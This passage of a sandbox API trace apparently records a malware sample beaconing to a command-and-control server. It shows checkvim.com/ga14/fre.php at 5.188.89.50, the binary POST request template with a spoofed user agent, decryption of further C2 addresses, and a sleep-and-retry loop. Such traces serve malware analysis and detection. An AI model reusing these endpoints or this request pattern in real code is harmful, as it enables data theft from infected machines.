(lpLibFileName="shlwapi") returned 0x76f60000 [0280.497] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0280.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0280.498] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0280.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0280.499] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0280.499] GetProcessHeap () returned 0x840000 [0280.499] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0280.499] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0280.500] GetProcessHeap () returned 0x840000 [0280.500] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bc8 [0280.500] socket (af=2, type=1, protocol=6) returned 0x444 [0280.501] connect (s=0x444, name=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0280.574] FreeAddrInfoW (pAddrInfo=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0280.574] GetProcessHeap () returned 0x840000 [0280.574] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0280.574] GetProcessHeap () returned 0x840000 [0280.574] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0280.575] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0280.577] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0280.577] GetProcessHeap () returned 0x840000 [0280.577] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0280.577] GetProcessHeap () returned 0x840000 [0280.577] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0280.577] GetProcessHeap () returned 0x840000 [0280.577] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f710 [0280.577] GetProcessHeap () returned 0x840000 [0280.577] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0280.578] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0280.579] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0280.579] GetProcessHeap () returned 0x840000 [0280.579] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0280.579] GetProcessHeap () returned 0x840000 [0280.579] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0280.579] send (s=0x444, buf=0x873a58*, len=237, flags=0) returned 237 [0280.579] send (s=0x444, buf=0x87eb58*, len=159, flags=0) returned 159 [0280.579] GetProcessHeap () returned 0x840000 [0280.579] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0280.579] recv (in: s=0x444, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0280.956] GetProcessHeap () returned 0x840000 [0280.956] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0280.956] GetProcessHeap () returned 0x840000 [0280.956] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0280.956] GetProcessHeap () returned 0x840000 [0280.956] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0280.956] GetProcessHeap () returned 0x840000 [0280.956] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0280.956] closesocket (s=0x444) returned 0 [0280.957] GetProcessHeap () returned 0x840000 [0280.957] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bc8 | out: hHeap=0x840000) returned 1 [0280.957] GetProcessHeap () returned 0x840000 [0280.957] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0280.957] GetProcessHeap () returned 0x840000 [0280.957] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fbd8 | out: hHeap=0x840000) returned 1 [0280.957] GetProcessHeap () returned 0x840000 [0280.957] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0280.957] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x5f8) returned 0x444 [0280.959] Sleep (dwMilliseconds=0xea60) [0280.961] GetProcessHeap () returned 0x840000 [0280.961] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f878 [0280.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0280.962] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0281.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.014] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0281.027] GetProcessHeap () returned 0x840000 [0281.027] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0281.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.029] CryptImportKey (in: hProv=0x86f248, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0281.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.030] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0281.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.031] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.031] GetProcessHeap () returned 0x840000 [0281.031] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0281.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.032] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f878, pdwDataLen=0x19f9a4 | out: pbData=0x87f878, pdwDataLen=0x19f9a4) returned 1 [0281.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.033] CryptDestroyKey (hKey=0x87e930) returned 1 [0281.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.041] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0281.041] GetProcessHeap () returned 0x840000 [0281.042] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0281.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0281.043] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0281.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0281.044] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0281.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0281.045] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0281.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0281.046] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0281.046] GetProcessHeap () returned 0x840000 [0281.046] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0281.046] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0281.046] GetProcessHeap () returned 0x840000 [0281.046] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0281.046] GetProcessHeap () returned 0x840000 [0281.047] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0281.047] GetProcessHeap () returned 0x840000 [0281.047] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f878 | out: hHeap=0x840000) returned 1 [0281.047] GetProcessHeap () returned 0x840000 [0281.047] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb90 [0281.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.048] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0281.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.056] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0281.063] GetProcessHeap () returned 0x840000 [0281.063] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0281.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.066] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7f0) returned 1 [0281.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.068] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0281.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.069] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.069] GetProcessHeap () returned 0x840000 [0281.069] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0281.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.070] CryptDecrypt (in: hKey=0x87e7f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb90, pdwDataLen=0x19f9a4 | out: pbData=0x87fb90, pdwDataLen=0x19f9a4) returned 1 [0281.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.071] CryptDestroyKey (hKey=0x87e7f0) returned 1 [0281.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.072] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0281.072] GetProcessHeap () returned 0x840000 [0281.072] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0281.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0281.073] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0281.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0281.074] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0281.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0281.075] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0281.075] GetProcessHeap () returned 0x840000 [0281.075] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0281.075] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ba8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0281.076] GetProcessHeap () returned 0x840000 [0281.076] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bf8 [0281.077] socket (af=2, type=1, protocol=6) returned 0x448 [0281.077] connect (s=0x448, name=0x878ba8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0281.146] FreeAddrInfoW (pAddrInfo=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ba8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0281.146] GetProcessHeap () returned 0x840000 [0281.146] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fd70 [0281.146] GetProcessHeap () returned 0x840000 [0281.146] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0281.147] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0281.148] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0281.148] GetProcessHeap () returned 0x840000 [0281.148] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0281.148] GetProcessHeap () returned 0x840000 [0281.148] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0281.148] GetProcessHeap () returned 0x840000 [0281.148] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f998 [0281.148] GetProcessHeap () returned 0x840000 [0281.148] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0281.149] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0281.149] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0281.149] GetProcessHeap () returned 0x840000 [0281.149] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0281.149] GetProcessHeap () returned 0x840000 [0281.149] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0281.149] send (s=0x448, buf=0x873a58*, len=237, flags=0) returned 237 [0281.150] send (s=0x448, buf=0x87eb58*, len=159, flags=0) returned 159 [0281.150] GetProcessHeap () returned 0x840000 [0281.150] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0281.150] recv (in: s=0x448, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0281.494] GetProcessHeap () returned 0x840000 [0281.494] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0281.494] GetProcessHeap () returned 0x840000 [0281.494] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0281.494] GetProcessHeap () returned 0x840000 [0281.494] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0281.494] GetProcessHeap () returned 0x840000 [0281.494] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fd70 | out: hHeap=0x840000) returned 1 [0281.494] closesocket (s=0x448) returned 0 [0281.497] GetProcessHeap () returned 0x840000 [0281.497] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bf8 | out: hHeap=0x840000) returned 1 [0281.497] GetProcessHeap () returned 0x840000 [0281.497] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0281.497] GetProcessHeap () returned 0x840000 [0281.497] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0281.497] GetProcessHeap () returned 0x840000 [0281.497] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0281.497] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x870) returned 0x448 [0281.499] Sleep (dwMilliseconds=0xea60) [0281.500] GetProcessHeap () returned 0x840000 [0281.500] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa70 [0281.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.502] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0281.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.507] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0281.514] GetProcessHeap () returned 0x840000 [0281.514] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0281.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.515] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0281.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.516] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0281.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.517] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.517] GetProcessHeap () returned 0x840000 [0281.518] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0281.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.518] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa70, pdwDataLen=0x19f9a4 | out: pbData=0x87fa70, pdwDataLen=0x19f9a4) returned 1 [0281.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.519] CryptDestroyKey (hKey=0x87e270) returned 1 [0281.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.520] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0281.520] GetProcessHeap () returned 0x840000 [0281.520] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0281.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0281.521] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0281.522] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0281.522] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0281.523] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0281.523] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0281.523] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0281.524] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0281.524] GetProcessHeap () returned 0x840000 [0281.524] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0281.524] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0281.524] GetProcessHeap () returned 0x840000 [0281.524] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0281.524] GetProcessHeap () returned 0x840000 [0281.524] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0281.524] GetProcessHeap () returned 0x840000 [0281.524] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa70 | out: hHeap=0x840000) returned 1 [0281.524] GetProcessHeap () returned 0x840000 [0281.524] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0281.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.525] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0281.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.531] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0281.537] GetProcessHeap () returned 0x840000 [0281.537] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0281.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.539] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6b0) returned 1 [0281.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.540] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0281.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.541] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.541] GetProcessHeap () returned 0x840000 [0281.541] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0281.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.542] CryptDecrypt (in: hKey=0x87e6b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0281.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.543] CryptDestroyKey (hKey=0x87e6b0) returned 1 [0281.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0281.544] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0281.544] GetProcessHeap () returned 0x840000 [0281.544] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0281.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0281.546] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0281.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0281.547] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0281.548] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0281.548] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0281.548] GetProcessHeap () returned 0x840000 [0281.548] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0281.548] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0281.550] GetProcessHeap () returned 0x840000 [0281.550] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c38 [0281.550] socket (af=2, type=1, protocol=6) returned 0x44c [0281.550] connect (s=0x44c, name=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0281.620] FreeAddrInfoW (pAddrInfo=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0281.620] GetProcessHeap () returned 0x840000 [0281.620] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) 